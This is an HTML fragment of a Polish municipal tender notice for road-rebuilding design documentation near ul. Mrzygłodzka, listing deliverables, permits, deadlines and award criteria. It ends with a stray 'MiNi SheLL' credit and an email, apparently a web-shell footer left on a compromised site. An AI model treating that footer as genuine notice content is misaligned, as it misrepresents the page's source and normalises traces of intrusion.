projektowanego chodnika i wjazdów. Rysunek ten określi dokładnie zajęcie terenu pod planowaną inwestycję i wskaże konieczność ewentualnego przejęcia dodatkowego terenu bądź też pozwoli uniknąć zajęcia obcego terenu, 13) W projektach na stronie tytułowej należy podać klasę drogi i kategorię ruchu. Przed opisem technicznym w projektach załączyć na odrębnej kartce podstawowe dane techniczne projektowanego obiektu takie jak długość, szerokość, powierzchnia dobudowywanych odcinków ulicy oraz materiał nawierzchni, 14) Przedmiot umowy należy dostarczyć w wersji tradycyjnej (papierowej) oraz na nośniku elektronicznym w formacie plików pdf (o jak najmniejszej pojemności z uwagi na konieczność zamieszczenia tych treści na stronie internetowej). Pliki muszą być zoptymalizowane pod względem rozmiaru; jakość zeskanowanych lub wygenerowanych dokumentów, rysunków powinny umożliwiać odczytanie wszystkich detali i cech, a jednocześnie uwzględniać i nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Wszystkie rysunki które znajdują się w projektach lub pisma, uzgodnienia itp. muszą znajdować się w wersji elektronicznej. Niedopuszczalne są zmiany bądź poprawki w dokumentacji bez ponownego, uwzględniającego te zmiany wykonania wersji elektronicznej. Każdy tom dokumentacji projektowej powinien być zapisany do pojedynczego pliku - nazwa pliku powinna odzwierciedlać temat opracowania. Pliki muszą być wgrane do katalogu o nazwie określającej lokalizacje przedmiotu umowy. W tym samym katalogu musi być umieszczony plik w formacie tekstowym o nazwie SPIS.TXT, zawierający listę plików wraz z pełnymi tytułami opracowań w nich zawartych. Przedmiary robót powinny być zapisane w podkatalogu o nazwie przedmiary. Mapa zasadnicza stanowi załączniki do specyfikacji istotnych warunków zamówienia. Przedmiot zamówienia określa także wzór umowy, który stanowi załącznik do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 110.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa drogi - ulicy bez nazwy, bocznej od ul. Mrzygłodzkiej położonej na dz. ew. nr 580/7; 577/4; 595; 170/6 wraz z odwodnieniem w ramach zadania pn.: Dokumentacja techniczna w zakresie rozwoju drogownictwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia: Przedmiotem zamówienia jest: wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz kosztorysu inwestorskiego - przebudowy gruntowego odcinka jezdni o długości ok. 140 mb wraz z odwodnieniem; - badanie podłoża gruntowego; Przedmiot zamówienia należy wykonać zgodnie z n/w przepisami: 1) rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 .r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2013 r., poz. 1129). 2) rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych programie funkcjonalno - użytkowym (Dz. U. z 2004 r. nr 130, poz. 1389). 1.Dokumentacja powinna zawierać: 1)projekt budowlany przebudowy drogi - budowy skrzyżowania ulicy bocznej, dz. nr ew. 580/7 i 577/4 z ul. Mrzygłodzką dz. nr ew.170/6 i 595 wraz z odwodnieniem w 6 egzemplarzach w wersji papierowej, 1egz.w wersji elektronicznej, 2)projekt budowlany przebudowy drogi ul. Bocznej od ul. Mrzygłodzkiej wraz z odwodnieniem - cały odcinek od granicy pasa drogowego ul. Mrzygłodzkiej w 6 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej 3)projekt wykonawczy przebudowy drogi, ulicy bocznej od ul. Mrzygłodzkiej dz. nr ew. 595; 170/6; 580/7 i 577/4 wraz z odwodnieniem w 4 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej, 4)przedmiar robót przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania, wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem liczby jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w § od 6 do 10 w/w rozporządzenia w 4 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej, 5)kosztorys inwestorski w 2 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej, 6)specyfikację techniczną wykonania i odbioru robót budowlanych przez którą należy rozumieć opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacja musi uwzględniać wymagania określone w § 13 i 14 w/w rozporządzenia w 3 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej, 7)projekt czasowej organizacji ruchu w 6 egzemplarzach w wersji papierowej. 1 egz. w wersji elektronicznej 8)projekt stałej organizacji ruchu w 6 egzemplarzach w wersji papierowej. 1 egz. w wersji elektronicznej, 9)mapa do celów projektowych w 6 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej, 10)Opracowanie geologiczno - inżynierskiej charakterystyki gruntów oraz warunków hydrogeologicznych na działkach nr 595; 170/6; 580/7 i 577/4 w 3 egzemplarzach w wersji papierowej. 2.W przypadku wystąpienia kolizji z istniejącymi sieciami podziemnymi i nadziemnym do obowiązków Wykonawcy należy opracowanie projektu zabezpieczenia sieci lub usunięcia kolizji. Szczegółowe rozwiązania winny być zgodne z warunkami technicznymi gestorów sieci, po akceptacji Zamawiającego. Uzyskanie warunków technicznych należy do obowiązków wykonawcy projektu. Dokumentację wykonać w ilościach jak określono powyżej. 3.Stan istniejący: Działki pod budowę przedmiotowej drogi znajdują się w dzielnicy Marciszów w rejonie skrzyżowania ulicy Przesmyk z ul. Mrzygłodzką - droga wojewódzka nr 791. Długość działki głównej wynosi ok. 140 mb , aktualnie posiada nawierzchnię gruntową, powierzchniowo utwardzoną kruszywem. Ulica jest zakończona na ślepo. W istniejącym pasie drogowym znajduje się uzbrojenie : - sieć elektryczna NN napowietrzna, kabel energetyczny End - kolektor sanitarny wraz z przyłączami do posesji - sieć wodociągowa. 4.Dokumentacja winna uwzględniać : - Budowę nawierzchni jezdni z kostki brukowej w granicach działki 580/7 na działce 577/4, budowa chodnika o nawierzchni z kostki brukowej. Przy bramach wjazdowych do posesji - utwardzone fragmenty wjazdów do przyległych posesji. Przy krawężnikach cieki deszczowe z dwóch rzędów kostki, szerokości 20 cm i głębokości 2 cm. - Odwodnienie jezdni wg propozycji projektanta - w najbliższej okolicy nie ma kolektora deszczowego. Wzdłuż ulicy Mrzygłodzkiej znajduje się rów jednostronny, który od wielu lat nie był konserwowany, obecnie jest zamulony i silnie wypłycony - konieczność uzgodnienia z Wojewódzkim Zarządem Dróg w Katowicach. - badanie podłoża gruntowego uwzględniając opinię hydrogeologiczną, - Projekt stałej organizacji ruchu dla skrzyżowania z drogą wojewódzką, - Projekt stałej organizacji ruchu dla pozostałej części ulicy bez nazwy, - Projekt czasowej organizacji ruchu dla skrzyżowania z drogą wojewódzką, - Projekt czasowej organizacji ruchu dla pozostałej części ulicy bez nazwy, - Komplet niezbędnych uzgodnień z właścicielami mediów: TAURON, RPW i K Zawiercie, Orange, PGN i G - Oddział w Zawierciu i GAZ - SYSTEM Świerklany, Powiatowy Zarząd Dróg w Zawierciu i ewentualnie inne które umożliwią Zamawiającemu zgłoszenie robót lub uzyskanie pozwolenia na budowę. 5.Projekt czasowej organizacji ruchu dla skrzyżowania z ul. Mrzygłodzką - winien uzyskać pozytywną opinię Wojewódzkiej Komendy Policji w Katowicach i zostać zatwierdzony przez Marszałka Województwa Śląskiego. (Realizację przedmiotowego zadania zaplanowano na 2016r.) 6.Projekt czasowej organizacji ruchu dla pozostałej części ulicy bez nazwy - winien uzyskać opinię Powiatowej Komendy Policji w Zawierciu oraz zatwierdzenie Powiatowego Zarządu Dróg w Zawierciu. 7.Projekt stałej organizacji ruchu dla skrzyżowania z ul. Mrzygłodzką - winien uzyskać pozytywną opinię Wojewódzkiej Komendy Policji w Katowicach i zostać zatwierdzony przez Marszałka Województwa Śląskiego. 8.Projekt stałej organizacji ruchu dla pozostałej części ulicy bez nazwy - winien uzyskać opinię Powiatowej Komendy Policji w Zawierciu oraz zatwierdzenie Powiatowego Zarządu Dróg w Zawierciu. 9.Ponadto do obowiązków Wykonawcy należy: 1)wykonanie badań geotechnicznych gruntu, które należy przedłożyć w formie opinii geotechnicznej wraz z dokumentacją badań podłoża gruntowego w 3 egzemplarzach w formie papierowej, 2)sprawdzenie w terenie warunków wykonania zamówienia (przed przystąpieniem do wykonania prac projektowych), 3)opracowanie projektu wstępnego (koncepcji) celem uzyskania akceptacji Zamawiającego dla proponowanych rozwiązań w terminie 1 miesiąca od podpisania umowy. Akceptacja nastąpi w formie pisemnej w ciągu 10 dni od daty złożenia. 4)uzyskanie wszelkich uzgodnień, zaświadczeń pozwalających na uzyskanie przez Inwestora zgłoszenia lub pozwolenia na budowę 5)opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, wskazaniu temu muszą towarzyszyć wyrazy lub równoważny, wraz z określeniem co należy przez to rozumieć (wskazanie parametrów technicznych). 6)konsultacja z Zamawiającym istotnych rozwiązań konstrukcyjnych, funkcjonalnych i materiałowych mających wpływ na koszty robót budowlanych, które będą wykonywane na podstawie opracowanego przedmiotu umowy a także przedłożenie ewentualnych propozycji rozwiązań nie ujętych w rozdz. III a istotnych z punktu widzenia Wykonawcy dla prawidłowego wykonania zamówienia, 7)wypełnienie wniosku o pozwolenie na budowę - 2 egz. W wersji papierowej( bez wpisywania daty), 8)w projektach na stronie tytułowej oraz na wszystkich rysunkach następnie w przedmiarach, kosztorysach inwestorskich i specyfikacjach technicznych datę zapisywać jako dzień, miesiąc, rok, 9)przy podpisach (oprócz rysunków) należy przystemplować imienne pieczęcie projektantów, 10)w przedmiarach i kosztorysach inwestorskich należy uwzględnić zgodnie z Rozporządzeniem kod i nazwę wspólnego słownika zamówień podstawowych zakresów robót, 11)przedmiary robót podzielić należy na rozdziały wg. poszczególnych asortymentów robót oraz tabelę elementów scalonych. W przedmiarach oprócz wszystkich asortymentów robót należy również uwzględnić pełną obsługę geodezyjną zadania . 12)W projektach na stronie tytułowej należy podać klasę drogi i kategorię ruchu. Przed opisem technicznym w projektach załączyć na odrębnej kartce podstawowe dane techniczne projektowanego obiektu takie jak długość, szerokość, powierzchnia dobudowywanych odcinków ulicy oraz materiał nawierzchni, - powierzchnia chodników + materiał nawierzchni, 13)Przedmiot umowy należy dostarczyć w wersji tradycyjnej (papierowej) oraz na nośniku elektronicznym w formacie plików pdf (o jak najmniejszej pojemności z uwagi na konieczność zamieszczenia tych treści na stronie internetowej). Pliki muszą być zoptymalizowane pod względem rozmiaru; jakość zeskanowanych lub wygenerowanych dokumentów, rysunków powinny umożliwiać odczytanie wszystkich detali i cech, a jednocześnie uwzględniać i nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Wszystkie rysunki które znajdują się w projektach lub pisma, uzgodnienia itp. muszą znajdować się w wersji elektronicznej. Niedopuszczalne są zmiany bądź poprawki w dokumentacji bez ponownego, uwzględniającego te zmiany wykonania wersji elektronicznej. Każdy tom dokumentacji projektowej powinien być zapisany do pojedynczego pliku - nazwa pliku powinna odzwierciedlać temat opracowania. Pliki muszą być wgrane do katalogu o nazwie określającej lokalizacje przedmiotu umowy. W tym samym katalogu musi być umieszczony plik w formacie tekstowym o nazwie SPIS.TXT, zawierający listę plików wraz z pełnymi tytułami opracowań w nich zawartych. Przedmiary robót powinny być zapisane w podkatalogu o nazwie przedmiary. Mapa zasadnicza stanowi załącznik do specyfikacji istotnych warunków zamówienia. Przedmiot zamówienia określa także wzór umowy, który stanowi załącznik do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com